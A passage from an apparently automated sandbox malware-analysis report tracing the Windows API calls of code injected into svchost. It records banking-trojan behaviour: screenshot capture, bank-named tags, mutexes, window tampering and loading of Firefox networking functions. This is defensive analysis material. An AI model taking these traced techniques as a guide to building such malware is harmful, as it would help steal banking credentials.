                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02C774F2
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C77501
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C77530
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7753F
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7754D
                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000), ref: 02C77556
                                                                                                                                                                                                                    • Sleep.KERNEL32(00002710,?,00000000), ref: 02C7759C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Create$EventFileMutexObjectSingleWait$HeapThreadmemset$AllocCheckConnectionDesktopInternetMappingViewlstrcpyn$AdminAliveCacheCountCurrentFlushNetworkReleaseResolverSleepTickUserVersionlstrcpymalloc
                                                                                                                                                                                                                    • String ID: user!226533!1CE3AAD1$P0#v$fuck
                                                                                                                                                                                                                    • API String ID: 2939156510-3182957975
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$fwrite$fseek$fclosefread
                                                                                                                                                                                                                    • String ID: 7f1bf8b2
                                                                                                                                                                                                                    • API String ID: 2434908339-2242988197
                                                                                                                                                                                                                    • Opcode ID: c40e4bed5cf97454075a45736d22c2bd94892342a3efaa6722b600237556d0fc
                                                                                                                                                                                                                    • Instruction ID: 1e974ff73977e1a7b5a8d9bb28150bf6261c6c699c825a5e133cf8dde1618f11
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c40e4bed5cf97454075a45736d22c2bd94892342a3efaa6722b600237556d0fc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8341F671A406449FD720EBA8CC85B6AF3E8EF98314F248A2DE985C37D1D278F4458B61
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841), ref: 02C909CA
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90A0C
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C90A18
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C90A1C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90A2D
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C90A34
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90A63
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C90A69
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C90A6D
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90A7E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C90A85
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C90ABA
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C90AD0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bf841$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-3898981795
                                                                                                                                                                                                                    • Opcode ID: 542c1874f4bc3e52dd528810bb4d1963d2f2196f39eb4ecada1477f36d36a40c
                                                                                                                                                                                                                    • Instruction ID: 9adedc9061a233322b623d4569dee6cd3ded6863e4bc389879186b729274d846
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 542c1874f4bc3e52dd528810bb4d1963d2f2196f39eb4ecada1477f36d36a40c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A310571E402985BDB219B749C5CBEBBBA8EF95300F4546D4EA89D3100DF70DA55CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C8A17A
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8A1BC
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8A1C8
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8A1CC
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8A1DD
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8A1E4
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8A213
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8A219
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8A21D
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8A22E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8A235
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8A26A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C8A280
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bfc59$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-2853034986
                                                                                                                                                                                                                    • Opcode ID: 6be01b82df11ddc65da618c02c39694b16699051bfaa5acf49fb64867bc43323
                                                                                                                                                                                                                    • Instruction ID: 81399e7e759840fcf260adc1e0ba70d5316192ef898cd4b424ea9abbfecd5d93
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6be01b82df11ddc65da618c02c39694b16699051bfaa5acf49fb64867bc43323
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70315871E002989BCB21EB349C98BEB7BA8EF85304F0486D5E989C3100DF30DA54CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf95c), ref: 02C9198A
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C919CC
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C919D8
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C919DC
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C919ED
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C919F4
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C91A23
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C91A29
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C91A2D
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C91A3E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C91A45
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C91A7A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C91A90
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bf95c$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-3288211317
                                                                                                                                                                                                                    • Opcode ID: d8ee8b92d7439d8aee7b7b41ec083de929fc90b976aed1a9591ea951ced87208
                                                                                                                                                                                                                    • Instruction ID: 97337809144342f5afb747c78701df50d7f1a3d8e6f0a197024a797b0774a99a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8ee8b92d7439d8aee7b7b41ec083de929fc90b976aed1a9591ea951ced87208
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34313571E402995FCB21DB34AC5DBEB7BA8AF85300F0946D4E989C3100DFB0DA58CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3), ref: 02C8E70A
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8E74C
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8E758
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8E75C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8E76D
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8E774
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8E7A3
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8E7A9
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8E7AD
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8E7BE
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8E7C5
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8E7FA
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C8E810
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bfde3$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-579213346
                                                                                                                                                                                                                    • Opcode ID: 06cebc02a5074d148f141090ae079b5a9de5b0e7e1b4cb22705ec0731ad908ea
                                                                                                                                                                                                                    • Instruction ID: c012ed745ce7834b89328ee85ffa25eefdb54afe5cdcc30dafb8a318effbca9e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06cebc02a5074d148f141090ae079b5a9de5b0e7e1b4cb22705ec0731ad908ea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4314871D402985BC721EB349C58BEB77A8AF85704F0589D4FA85C3101DF70DA54CBA4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C916BA
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C916FC
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C91708
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C9170C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9171D
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C91724
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C91753
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C91759
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C9175D
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9176E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C91775
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C917AA
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C917C0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7F1BF8F3$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-197625633
                                                                                                                                                                                                                    • Opcode ID: ba8445a1f94566e55d1cd96c645874cd34b7fa93c6c2f41fc11f26e518bfdf13
                                                                                                                                                                                                                    • Instruction ID: d0669bbe0d88d5412a30cdd21ac2ea9879cccbf1a7e9ba89ea04bb6e565d3bca
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba8445a1f94566e55d1cd96c645874cd34b7fa93c6c2f41fc11f26e518bfdf13
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3310771D4029A5BCB119B749C5DBEB77E8EF85700F4846D4EA89C3100DF71DA55CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfddb), ref: 02C8F64A
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F68C
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8F698
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8F69C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F6AD
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8F6B4
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F6E3
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8F6E9
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8F6ED
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F6FE
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8F705
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8F73A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C8F750
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bfddb$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-1126418628
                                                                                                                                                                                                                    • Opcode ID: 35d3f24ee474b8a154757338705ddac402c16e5e072ae1be3ed9d89c386b56e7
                                                                                                                                                                                                                    • Instruction ID: 33ba1aa2bca3817b726cdd523b38e0fc18711386a38419310ee17da1da5b38a0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35d3f24ee474b8a154757338705ddac402c16e5e072ae1be3ed9d89c386b56e7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED314C71D002985BD722EB749C58BEB7BE8EF84304F4486D8E985D3100DF70DA59CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C7B5BD
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7B5C0
                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 02C7B5C5
                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 02C7B5D4
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 02C7B5E7
                                                                                                                                                                                                                    • GetClassNameA.USER32(00000000,?,00000101), ref: 02C7B609
                                                                                                                                                                                                                    • GetWindowInfo.USER32(00000000,?), ref: 02C7B675
                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,?), ref: 02C7B697
                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 02C7B6A6
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000E6), ref: 02C7B6AF
                                                                                                                                                                                                                    • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7B6C2
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 02C7B6CA
                                                                                                                                                                                                                    • EnumChildWindows.USER32(00000000,02C7B530,00000000), ref: 02C7B6D8
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000003), ref: 02C7B6E1
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 02C7B6EF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ClassLong$SleepVisible$AttributesChildEnumInfoLayeredNameProcessThreadWindows
                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                    • API String ID: 3510281082-4251816714
                                                                                                                                                                                                                    • Opcode ID: 0bfcfc3708f5875f3a5ef9a59b9a8bcfabd5fc2b1915eb7716a2c70c28197be6
                                                                                                                                                                                                                    • Instruction ID: f0ecb02aec1f7eb1ce84d6a1a970ddf49098eaf1fd3417fdd5b4e5ac0b340f7f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bfcfc3708f5875f3a5ef9a59b9a8bcfabd5fc2b1915eb7716a2c70c28197be6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD31E130A90655AFEB2A9B64DC4AFAE7A2CEF45749F000744F612A20C0DB749E11CA65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90B1C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C90B2D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B41
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90B4F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C909A0,00000000,00000000,00000000), ref: 02C90B64
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C90B75
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C90B7A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B8E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90B9C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841), ref: 02C90BA7
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bf841,RAIFF), ref: 02C90BC1
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C90BCA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bf841$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RAIFF
                                                                                                                                                                                                                    • API String ID: 505831200-2004234703
                                                                                                                                                                                                                    • Opcode ID: 7f78a7c3451d5d4f5334f9850f786c9ae6d7ba5abe8ba875d4bdfd9d4428052f
                                                                                                                                                                                                                    • Instruction ID: e6b70bb27d61c34d8a9be23afc102e9d7ab718ba819a6fa34f7ce02b850e8a58
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f78a7c3451d5d4f5334f9850f786c9ae6d7ba5abe8ba875d4bdfd9d4428052f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE11B630AC9755BAF7126B658C1EF1E37DC5F44B19F104654F551A30C1EBF0E9008AAA
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02C91ADC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C91AED
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B01
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C91B0F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C91960,00000000,00000000,00000000), ref: 02C91B24
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C91B35
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C91B3A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B4E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C91B5C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf95c), ref: 02C91B67
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bf95c,RSTYLE), ref: 02C91B81
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C91B8A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bf95c$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0#v$RSTYLE
                                                                                                                                                                                                                    • API String ID: 505831200-2899104252
                                                                                                                                                                                                                    • Opcode ID: a4a3d1e9f6ed5d70f24a0a013588e84c90c1aa0e7e619a67d40516cb74c0f158
                                                                                                                                                                                                                    • Instruction ID: b08893210dbc9ebcc0b73e871e23fbd590f2a43a74c877046b024da61a8c4ed2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4a3d1e9f6ed5d70f24a0a013588e84c90c1aa0e7e619a67d40516cb74c0f158
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C11E630AC47537BF6126B658C0FF1A369C9F81B64F184654F919620C1EBF4A9008A7B
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(nspr4.dll,00000000,00000000,00000000,02C84822), ref: 02C7EEBA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 02C7EED7
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 02C7EEF3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 02C7EF0F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 02C7EF2B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 02C7EF47
